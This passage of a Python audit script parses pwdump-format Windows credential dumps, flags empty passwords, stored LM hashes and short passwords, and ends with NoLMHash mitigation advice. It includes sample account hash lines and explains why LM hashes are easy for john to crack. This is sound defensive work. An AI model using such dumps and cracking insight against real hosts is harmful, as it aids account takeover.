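Administrator:500:626309417146BFFDAAD3B435B51404EE:C136578936200A5DDAB03847745758F7:::
labuser:1003:AAD3B435B51404EEAAD3B435B51404EE:0123456789ABCDEF0123456789ABCDEF:::
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
"""


def parse_pwdump(text):
    """Parse pwdump lines into dicts; reject malformed lines loudly."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) < 4:
            raise ValueError(f"line {lineno}: expected user:rid:lm:nt, got {line!r}")
        user, rid, lm, nt = fields[0], int(fields[1]), fields[2].upper(), fields[3].upper()
        if len(lm) != 32 or len(nt) != 32:
            raise ValueError(f"line {lineno}: hash fields must be 32 hex characters")
        entries.append({"user": user, "rid": rid, "lm": lm, "nt": nt})
    return entries


def audit(entry):
    """Return the list of finding codes for one account, in a fixed order."""
    findings = []
    lm, nt = entry["lm"], entry["nt"]
    if nt == EMPTY_NT:
        findings.append("EMPTY_PASSWORD")
    if lm != EMPTY_LM:
        # A real LM hash is stored, so NoLMHash was not in effect when this
        # password was set; the LM scheme is case-insensitive and split into
        # two independent 7-character halves, which is why john starts on it.
        findings.append("LM_HASH_STORED")
        if lm[16:] == EMPTY_LM_HALF:
            # Second half is the empty-half constant: password is <= 7 chars.
            findings.append("PASSWORD_LE_7_CHARS")
    return findings


def audit_file(text):
    """Map each account name to its finding codes."""
    return {e["user"]: audit(e) for e in parse_pwdump(text)}


if __name__ == "__main__":
    for user, codes in audit_file(SAMPLE_PWDUMP).items():
        print(f"{user:15} {', '.join(codes) or 'ok'}")
```

For the Administrator entry from the transcript the audit reports both LM findings, which explains why john was able to load it straight away; the mitigation on the host is to enable the NoLMHash policy and reset the affected passwords to longer than 14 characters (or simply reset them once LM storage is off) so no LM hash is written again.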
